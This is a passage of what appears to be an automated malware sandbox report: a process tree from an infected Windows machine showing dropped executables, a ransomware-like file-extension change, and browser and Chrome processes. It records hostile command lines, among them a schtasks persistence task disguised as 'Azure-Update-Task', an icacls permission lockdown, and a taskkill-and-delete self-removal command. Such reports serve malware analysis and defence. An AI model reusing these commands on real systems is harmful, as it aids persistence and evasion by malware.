                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3224 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3096 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2628 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BE28.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\E92.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E92.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\E92.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies extensions of user files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\54da30f7-f046-451b-8ac4-be7013a9e42f\build3.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1E72.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1E72.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 8028 -s 1004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1EAD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1EAD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd59ec4f50,0x7ffd59ec4f60,0x7ffd59ec4f70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1628 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,18351935695019404465,11045670740359552499,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
